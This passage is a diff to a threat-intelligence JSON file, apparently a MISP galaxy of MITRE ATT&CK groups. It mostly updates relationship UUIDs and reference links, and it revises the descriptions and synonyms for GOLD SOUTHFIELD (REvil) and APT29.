},
+ {
+ "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475",
"tags": [
@@ -6553,6 +6492,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "86724806-7ec9-4a48-a0a7-ecbde3bf4810",
"tags": [
@@ -6595,6 +6541,13 @@
],
"type": "similar"
},
+ {
+ "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0",
"tags": [
@@ -6644,6 +6597,27 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "ba724df5-9aa0-45ca-8e0e-7101c208ae48",
"tags": [
@@ -6651,6 +6625,13 @@
],
"type": "similar"
},
+ {
+ "dest-uuid": "baf60e1a-afe5-4d31-830f-1b1ba2351884",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "bc76d0a4-db11-4551-9ac4-01a469cfb161",
"tags": [
@@ -6666,7 +6647,14 @@
"type": "uses"
},
{
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
+ "dest-uuid": "bf90d72c-c00b-45e3-b3aa-68560560d4c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -6693,6 +6681,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d56c99fa-4710-472c-81a6-41b7a84ea4be",
"tags": [
@@ -6728,6 +6723,20 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "e48df773-7c95-4a4c-ba70-ea3d15900148",
"tags": [
@@ -6756,6 +6765,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "ed730f20-0e44-48b9-85f8-0e2adeb76867",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9",
"tags": [
@@ -6815,89 +6831,12 @@
]
},
"related": [
- {
- "dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "0ec2f388-bf0f-4b5c-97b1-fc736d26c25f",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "revoked-by"
- },
- {
- "dest-uuid": "2b742742-28c3-4e1b-bab7-8350d6300fa7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "7a0d4c09-dfe7-4fa2-965a-1a0e42fedd70",
@@ -7014,13 +6953,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0",
"tags": [
@@ -7404,17 +7336,19 @@
"value": "Tonto Team - G0131"
},
{
- "description": "[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2019 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)",
+ "description": "[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)",
"meta": {
"external_id": "G0115",
"refs": [
"https://attack.mitre.org/groups/G0115",
+ "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/",
"https://www.secureworks.com/blog/revil-the-gandcrab-connection",
"https://www.secureworks.com/research/revil-sodinokibi-ransomware",
"https://www.secureworks.com/research/threat-profiles/gold-southfield"
],
"synonyms": [
- "GOLD SOUTHFIELD"
+ "GOLD SOUTHFIELD",
+ "Pinchy Spider"
]
},
"related": [
@@ -7482,14 +7416,14 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -7801,6 +7735,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
"tags": [
@@ -8344,6 +8285,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "2d3f5b3c-54ca-4f4d-bb1f-849346d31230",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
"tags": [
@@ -8684,6 +8632,9 @@
"refs": [
"https://attack.mitre.org/groups/G0143",
"https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/"
+ ],
+ "synonyms": [
+ "Aquatic Panda"
]
},
"related": [
@@ -8764,13 +8715,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
"tags": [
@@ -8785,6 +8729,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -8832,6 +8783,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "084517bc-b8e7-5c86-a218-3f19e1379f3e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
"tags": [
@@ -8964,13 +8922,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "084517bc-b8e7-5c86-a218-3f19e1379f3e",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "e44e0985-bc65-4a8f-b578-211c858128e3",
@@ -9114,6 +9065,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "5282dd9a-d26d-4e16-88b7-7c0f4553daf4",
"tags": [
@@ -9205,6 +9163,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "9664ad0e-789e-40ac-82e2-d7b17fbe8fb3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "9fa07bef-9c81-421e-a8e5-ad4366c5a925",
"tags": [
@@ -9518,13 +9483,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "93ae2edf-a598-4d2d-acd7-bcae0c021923",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
"tags": [
@@ -9567,13 +9525,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -10208,11 +10159,11 @@
"external_id": "G0001",
"refs": [
"http://blogs.cisco.com/security/talos/threat-spotlight-group-72",
- "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
- "http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf",
"https://attack.mitre.org/groups/G0001",
"https://securelist.com/games-are-over/70991/",
- "https://securelist.com/winnti-more-than-just-a-game/37029/"
+ "https://securelist.com/winnti-more-than-just-a-game/37029/",
+ "https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf",
+ "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf"
],
"synonyms": [
"Axiom",
@@ -10633,6 +10584,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23",
"tags": [
@@ -11060,13 +11018,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5",
"tags": [
@@ -11172,6 +11123,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6",
"tags": [
@@ -11316,6 +11274,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23",
"tags": [
@@ -11722,6 +11687,13 @@
],
"type": "similar"
},
+ {
+ "dest-uuid": "ad1a6df6-2251-5e47-a245-8693c1ace8fb",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60",
"tags": [
@@ -11799,13 +11771,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0",
"tags": [
@@ -11820,6 +11785,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -11932,13 +11904,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b",
"tags": [
@@ -11952,13 +11917,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "ad1a6df6-2251-5e47-a245-8693c1ace8fb",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "247cb30b-955f-42eb-97a5-a89fef69341e",
@@ -12263,6 +12221,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "deb98323-e13f-4b0c-8d94-175379069062",
"tags": [
@@ -12597,6 +12562,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "3d9f700c-5eb5-5d36-a6e7-47b55f2844cd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b",
"tags": [
@@ -13191,13 +13163,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "3d9f700c-5eb5-5d36-a6e7-47b55f2844cd",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "bef4c620-0787-42a8-a96d-b7eb6e85917c",
@@ -13216,13 +13181,6 @@
]
},
"related": [
- {
- "dest-uuid": "10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643",
"tags": [
@@ -13962,6 +13920,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "231a81cd-4e24-590b-b084-1a4715b30d67",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "232a7e42-cd6e-4902-8fe9-2960f529dd4d",
"tags": [
@@ -13983,6 +13948,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "2d3f5b3c-54ca-4f4d-bb1f-849346d31230",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
"tags": [
@@ -14109,13 +14081,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
"tags": [
@@ -14158,6 +14123,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -14241,13 +14213,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "231a81cd-4e24-590b-b084-1a4715b30d67",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
@@ -14342,6 +14307,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "a4aba29f-fb91-50d9-bdf9-2b184922a200",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60",
"tags": [
@@ -14369,13 +14341,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "a4aba29f-fb91-50d9-bdf9-2b184922a200",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "55033a4d-3ffe-46b2-99b4-2c1541e9ce1c",
@@ -14762,13 +14727,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47",
"tags": [
@@ -14804,6 +14762,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"tags": [
@@ -15215,7 +15180,7 @@
"value": "APT18 - G0026"
},
{
- "description": "[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021)\n\nIn April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)",
+ "description": "[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021)\n\nIn April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Unit 42 SolarStorm December 2020)",
"meta": {
"external_id": "G0016",
"refs": [
@@ -15224,6 +15189,7 @@
"https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/",
"https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF",
"https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/",
+ "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline/",
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
"https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/",
"https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/",
@@ -15239,6 +15205,8 @@
"https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf",
"https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf",
"https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html",
"https://www.secureworks.com/research/threat-profiles/iron-ritual",
"https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf",
"https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/",
@@ -15257,7 +15225,9 @@
"YTTRIUM",
"The Dukes",
"Cozy Bear",
- "CozyDuke"
+ "CozyDuke",
+ "SolarStorm",
+ "Blue Kitsune"
]
},
"related": [
@@ -15275,13 +15245,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
"tags": [
@@ -15296,13 +15259,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "066b057c-944e-4cfc-b654-e3dfba04b926",
"tags": [
@@ -15311,14 +15267,14 @@
"type": "uses"
},
{
- "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
+ "dest-uuid": "09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "10ffac09-e42d-4f56-ab20-db94c67d76ff",
+ "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -15338,20 +15294,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "132d5b37-aac5-4378-a8dc-3127b18a73dc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "199463de-d9be-46d6-bb41-07234c1dd5a6",
"tags": [
@@ -15373,13 +15315,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "1f9c2bae-b441-4f66-a8af-b65946ee72f2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
"tags": [
@@ -15387,13 +15322,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
"tags": [
@@ -15401,13 +15329,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "24769ab5-14bd-4f4e-a752-cfb185da53ee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11",
"tags": [
@@ -15415,13 +15336,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "2b742742-28c3-4e1b-bab7-8350d6300fa7",
"tags": [
@@ -15443,13 +15357,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
"tags": [
@@ -15478,13 +15385,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "32901740-b42c-4fdd-bc02-345b5dc57082",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "32f49626-87f4-4d6c-8f59-a0dca953fe26",
"tags": [
@@ -15492,20 +15392,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "359b00ad-9425-420b-bba5-6de8d600cbc0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "3a4197ae-ec63-4162-907b-9a073d1157e4",
"tags": [
@@ -15514,14 +15400,7 @@
"type": "uses"
},
{
- "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "dest-uuid": "3d52e51e-f6db-4719-813c-48002a99f43a",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -15548,34 +15427,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
